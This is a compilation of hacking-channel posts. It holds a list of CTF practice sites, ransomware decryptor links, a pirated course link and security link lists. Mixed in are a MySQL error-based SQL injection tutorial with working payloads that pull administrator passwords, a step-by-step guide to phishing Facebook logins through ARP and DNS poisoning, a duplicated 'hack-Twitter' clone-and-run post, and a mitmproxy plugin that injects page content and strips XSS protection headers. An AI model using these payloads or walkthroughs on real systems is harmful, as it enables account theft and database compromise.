▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑EFSView lists the users who have ordinary decryption keys or recovery keys for an EFS encrypted file.
#fastTips

1) Usage instructions
Download the exe file and run it from the Command Prompt. It will give you the instructions you need.

2) Questions and answers
Q: When I double-click on the file a window comes up and disappears immediately. What's wrong?

A: You must run the file from a Command Prompt.

3) download :
https://vidstromlabs.com/downloads/efsview.exe

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 YTop sites for practice hacking :

1. CTF365
CTF365 users install and protect their own servers at the same time they attack other users' servers. CTF365 is suitable for security professionals looking to develop offensive skills or system administrators interested in improving their defensive skills. If you're new to the infosec, you can sign up for a free beginner account and get to know it through a few pre-configured vulnerable servers.

2. OVERTHEWIRE
OverTheWire is suitable for everyone who wants to study the theory of information security and apply it in practice, regardless of their experience. Beginners should start with the Bandit-level challenges as they are needed to further other challenges.

3. HACKING-LAB
Hacking-Labs provide CTF challenges for the European Cyber ​​Security Challenge, but they also host regular competitions on their platform that anyone can participate in. Just register, set up a vpn and choose a task to your liking.

4. PWNABLE.KR
This platform focuses on pwn-like CTF-like tasks, the essence of which is to find, read and send the flag files that are in each task. You must use programming, reverse engineering, or vulnerability exploitation skills to access the contents of the files before you can submit a solution.

Problems are divided into 4 levels of difficulty: easy - for beginners, intermediate, difficult and hardcore, where tasks require non-standard approaches to solve.

5. IO
IO is a wargame from the creators of netgarage.org, a community where like-minded people share knowledge about security, artificial intelligence, VR and more. 3 versions of wargame were created: IO, IO64 and IOarm, of all IO is the most mature. Connect to IO via SSH and you can get to work.

6. SMASHTHESTACK
SmashTheStack consists of 7 different wargames: Amateria, Apfel (currently offline), Blackbox, Blowfish, CTF (currently offline), Logic and Tux. Each wargame contains many tasks, ranging from standard vulnerabilities to reverse engineering tasks.

7. MICROCORRUPTION
Microcorruption is a CTF in which you need to "reverse" the fictional electronic lockitall devices. Lockitall devices protect bonds held in warehouses owned by the fictitious company Cy Yombinator. On the road to stealing bonds, you will learn assembly language, learn how to use the debugger, step through code, set breakpoints, and examine memory.

8. REVERSING.KR
Here you can find 26 challenges to test your hacking and reverse engineering skills. The site has not been updated since the end of 2012, but the tasks in hand are still valuable learning resources.

9. HACK THIS SITE
Hack This Site is a free wargame site to test and improve your hacking skills. We can find many hacking tasks in it in several categories, including basic tasks, realistic tasks, applications, programming, phreaking , JavaScript, forensics , steganography , etc. The site also boasts an active community with a large directory of hacker articles and a forum for discussing security-related issues. It was recently announced that the site's codebase will be overhauled, so big improvements can be expected in the coming months.

10. W3CHALLS
W3Challs is a multi-tasking learning platform in various categories, including hacking, wargaming, forensics, cryptography, steganography, and programming. The goal of the platform is to provide realistic challenges. You get points depending on the complexity of the problem solved. There is also a forum where you can discuss and solve problems with other members.

11. PWN0
The pwn0 site is a VPN where almost anything happens. Fight against bots or users and gain points by gaining control over other systems.

12. EXPLOIT EXERCISES
Exploit Exercises offers a variety of virtual machines, documentation, and tasks that will come in handy in learning privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and more.

13. RINGZER0 TEAM ONLINE CTF
RingZer0 Team Online CTF offers over 200 challenges that will allow you to test your hacking skills in multiple areas - from cryptography, malware analysis to SQL injection , shellcoding, and more. After you have found a solution to the problem, you can send it to RingZer0 Team. If your decision is accepted, you will receive RingZer0Gold, which can be exchanged for hints while solving problems.

14. HELLBOUND HACKERS
On Hellbound Hackers you can find traditional tasks with exploits and such task formats that are not available on other resources. For example, application patching and time-limited tasks. In patching tasks, you are given a vulnerable piece of code and you need to propose a fix for this vulnerability.

15. TRY2HACK
Try2Hack is one of the oldest sites for improving hacking skills and is still afloat. He offers several challenges to keep you entertained. The tasks are varied and become more difficult as you progress.

16. HACK.ME
Hack.me is a large collection of vulnerable web applications for putting your hacking skills into practice. All applications are provided by the community and each can be run on the fly in a secure, isolated sandbox.

17. HACKTHIS !!
HackThis !! consists of 50+ tasks of different levels, for solving each of which you get a certain number of points depending on the difficulty level. Similar to Hack This Site, HackThis !! There is also a lively community, numerous articles and news about hacking, and a forum where you can discuss security-related tasks and issues.

18. ENIGMA GROUP
The Enigma Group contains over 300 tasks with a focus on the top 10 OWASP exploits. The site has nearly 48,000 active members and hosts weekly CTF contests as well as weekly and monthly contests.

19. GOOGLE GRUYERE
Google Gruyere shows you how to exploit vulnerabilities in web applications and how to protect against them. You can do real penetration testing and actually hack a real application using attacks like XSS and XSRF .

20. GAME OF HACKS
Game of Hacks shows you a set of code snippets as a multi-choice quiz, and you must identify the correct vulnerability in the code. This site stands out a bit from this list, but nevertheless it's a good game to spot vulnerabilities in your code.

21. ROOT ME
Root Me offers over 200 challenges and over 50 virtual environments allowing you to practice your hacking skills in a variety of scenarios. This is definitely one of the best sites on this list.

22. CTFTIME
While CTFtime is not a hacking site like the others on this list, it is a great resource to stay up to date with CTF competitions happening around the world. Therefore, if you are interested in joining a CTF team or participating in a competition, you should take a look here.

23. PENTESTERLAB
PentesterLab is an easy and convenient way to learn pentesting . The site provides vulnerable systems that can be used to test and study vulnerabilities. In practice, you can work with real vulnerabilities both online and offline.

E N J O Y ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Top sites for practice hacking Full list

Hiding Registry keys with PSRe ect #requested

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑why php is important in hacking ?
> What can be done in PHP

According to the official PHP site, you can:

> collect form data (login / password input, etc.);

> create dynamic content on pages;

> send and receive cookies;

> write scripts on the command line;

> execute scripts on the server side;

> develop desktop applications.

> Which companies use PHP
Facebook, Lyft, Mint, Hootsuite, Viber, Buffer, DocuSig

#fastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pro Class - Chris Voss Teaches the Art of Negotiation — 7.6 GB—
5 rates

https://mega.nz/folder/XslXwZBT#OP_1pb3eyX5WTTGy2DptsA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑mysql injection error utilization method

This tutorial mainly introduces the relevant information summarized by the mysql injection error reporting method. Friends who need it can refer to

1️⃣Report an error through the floor

You can use the following code

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

> Examples are as follows:

First, make a normal query:

mysql> select * from article where id = 1;

+—-+——-+———+

| id | title | content |

+—-+——-+———+

| 1 | test | do it |

+—-+——-+———+

If the id input is injected, you can report an error with the following statement.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key'group_key'

You can see that the version of Mysql has been successfully released. If you need to query other data, you can query by modifying the statement where version() is located.

For example, we need to query the administrator username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)* 2)));

ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'

2️⃣ExtractValue

The test statement is as follows

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual testing process

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–

ERROR 1105 (HY000): XPATH syntax error:'\admin888'

3️⃣ UpdateXml

Test statement

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual testing process

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error:':root@localhost'

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Make A Autorun File For Ur Cd.txt
#fastTips

If you wanna make a autorun file for that CD you are ready to burn just read this...

1) You open notepad

2) now you writ: [autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE

Now save it but not as a .txt file but as a .inf file.

But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun .inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "This Computer"

#fastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Step by step Hacking Facebook Using Man in the Middle Attack:

Attacker IP Address : 192.168.160.148

Victim IP Address : 192.168.160.82

Fake Web Server : 192.168.160.148

I assume you’re in a Local Area Network now.

1) Install the XAMPP and run the APACHE and MySQL service

> http://www.apachefriends.org/en/xampp.html

2) Extract the fb.rar and copy the content to C:\xampp\htdocs

3) Check the fake web server by open it in a web browser and type http://localhost/

4) Install Cain & Abel and do the APR(ARP Poisoning Routing)
http://www.oxid.it/cain.html

5) Choose your interface for sniffing and click OK. When it’s finish, click again the Start/Stop Sniffer to activate the sniffing interface.

6) Go to the Sniffer tab and then click the + (plus sign)

7) Select "All hosts in my subnet" and Click OK.

8) You will see the other people in your network, but my target is 192.168.160.82 (MySelf…LoL :p)

9) After we got all of the information, click at the bottom of application the APR tab.

10) When you finish, now the next step is preparing to redirect the facebook.com page to the fake web server.

Click "APR DNS" and click + to add the new redirecting rule.

11) When everything is finish, just click OK. Then the next step is to activate the APR by clicking the Start/Stop APR button.


12) Now Hacking Facebook using MITM has been activated. This is how it looks like when victim opened http://www.facebook.com

13) But if you ping the domain name, you can reveal that it’s fake, because the address is IP of the attacker

E N J O Y ❤️👍🏻
dark wiki source
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Twitter pentesting 2020 :

> Bypass credibility page ( With the help of user-email.py )

> Save / Tweet the video

> Check valid username

> Check Email

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git https://github.com/0xfff0800/hack-Twitter

2) cd hack-Twitter

3) chmod +x hack-Twitter.py

4) chmod +x user-email.py

5) python3 hack-Twitter.py

6) python3 user-email.py

> video tutorial
https://youtu.be/InonDo1dPdk

ENJOY❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Twitter pentesting 2020 :

> Bypass credibility page ( With the help of user-email.py )

> Save / Tweet the video

> Check valid username

> Check Email

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git https://github.com/0xfff0800/hack-Twitter

2) cd hack-Twitter

3) chmod +x hack-Twitter.py

4) chmod +x user-email.py

5) python3 hack-Twitter.py

6) python3 user-email.py

> video tutorial
https://youtu.be/InonDo1dPdk

ENJOY❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST 2020 FREE RANSOMWARE DECRYPTORS BY AVAST :
— N E V E R P A Y F O R A R A N S O M W A R E —

https://files.avast.com/files/decryptor/avast_decryptor_globe.exe

https://files.avast.com/files/decryptor/avast_decryptor_hiddentear.exe

https://files.avast.com/files/decryptor/avast_decryptor_jigsaw.exe

https://files.avast.com/files/decryptor/avast_decryptor_lambdalocker.exe

https://files.avast.com/files/decryptor/avast_decryptor_legion.exe

https://files.avast.com/files/decryptor/avast_decryptor_noobcrypt.exe

https://files.avast.com/files/decryptor/avast_decryptor_stampado.exe

https://files.avast.com/files/decryptor/avast_decryptor_szflocker.exe

https://files.avast.com/files/decryptor/avast_decryptor_teslacrypt3.exe

https://files.avast.com/files/decryptor/avast_decryptor_troldesh.exe

https://files.avast.com/files/decryptor/avast_decryptor_xdata.exe


ENJOY❤️👍🏻
MORE DETAILS: https://www.avast.com/ransomware-decryption-tools
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/extension/" automatically will be listed on Pumpkin-Proxy tab.



The Code Plugins Dev

from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate

class Nameplugin(PluginTemplate):
meta = {
'Name' : 'Nameplugin',
'Version' : '1.0',
'Description' : 'Brief description of the new plugin',
'Author' : 'by dev'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
# if you want set arguments check refer wiki more info.
self.ConfigParser = False # No require arguments

def request(self, flow):
print flow.__dict__
print flow.request.__dict__
print flow.request.headers.__dict__ # request headers
host = flow.request.pretty_host # get domain on the fly requests
versionH = flow.request.http_version # get http version

# get redirect domains example
# pretty_host takes the "Host" header of the request into account,
if flow.request.pretty_host == "example.org":
flow.request.host = "mitmproxy.org"

# get all request Header example
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))

print flow.request.method # show method request
# the model printer data
self.send_output.emit('[NamePlugin]:: this is model for save data logging')

def response(self, flow):
print flow.__dict__
print flow.response.__dict__
print flow.response.headers.__dict__ #convert headers for python dict
print flow.response.headers['Content-Type'] # get content type

#every HTTP response before it is returned to the client
with decoded(flow.response):
print flow.response.content # content html
flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag

del flow.response.headers["X-XSS-Protection"] # remove protection Header

flow.response.headers["newheader"] = "foo" # adds a new header
#and the new header will be added to all responses passing through the proxy

(not coded by under code)
E N J O Y ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 new EXPLOITS AND ADVISORIES TUTORIALS :

Http://www.exploit-db.com/

Http://www.cvedetails.com/

Http://www.packetstormsecurity.org/

http://www.securityforest.com/wiki/index.php/Main_Page

Http://www.securityfocus.com/bid

Http://nvd.nist.gov/

Http://osvdb.org/

http://www.nullbyte.org.il/Index.html

Http://secdocs.lonerunners.net/

http://www.phenoelit-us.org/whatSAP/index.html

Http://secunia.com/

Http://cve.mitre.org/

🦑CHEATSHEETS AND SYNTAX

Http://www.cheat-sheets.org/

Http://blog.securitymonks.com/2009/08/15/whats-in-your-folder-security-cheat-sheets/Http://www.exploit-db.com/

Http://www.cvedetails.com/

Http://www.packetstormsecurity.org/

http://www.securityforest.com/wiki/index.php/Main_Page

Http://www.securityfocus.com/bid

Http://nvd.nist.gov/

Http://osvdb.org/

http://www.nullbyte.org.il/Index.html

Http://secdocs.lonerunners.net/

http://www.phenoelit-us.org/whatSAP/index.html

Http://secunia.com/

Http://cve.mitre.org/

E N J O Y ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑AGILE HACKING/Injections sources :
#resources

Http://www.gnucitizen.org/blog/agile-hacking-a-homegrown-telnet-based-portscanner/

Http://blog.commandlinekungfu.com/

Http://www.securityaegis.com/simple-yet-effective-directory-bruteforcing/

Http://isc.sans.edu/diary.html?storyid=2376

Http://isc.sans.edu/diary.html?storyid=1229

Http://ss64.com/nt/

Http://pauldotcom.com/2010/02/running-a-command-on-every-
mac.html

Http://synjunkie.blogspot.com/2008/03/command-line-ninjitsu.html

Http://www.zonbi.org/2010/06/09/wmic-the-other-other-white-meat/

Http://rstcenter.com/forum/22324-hacking-without-tools-windows.rst

http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf

http://www.scribd.com/Penetration-Testing-Ninjitsu2-Infrastructure-and-Netcat-without-Netcat/d/3064507

Http://www.pentesterscripting.com/

Http://www.sans.org/reading_room/whitepapers/hackers/windows-script-host-hack-windows_33583

http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf

E N J O Y ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁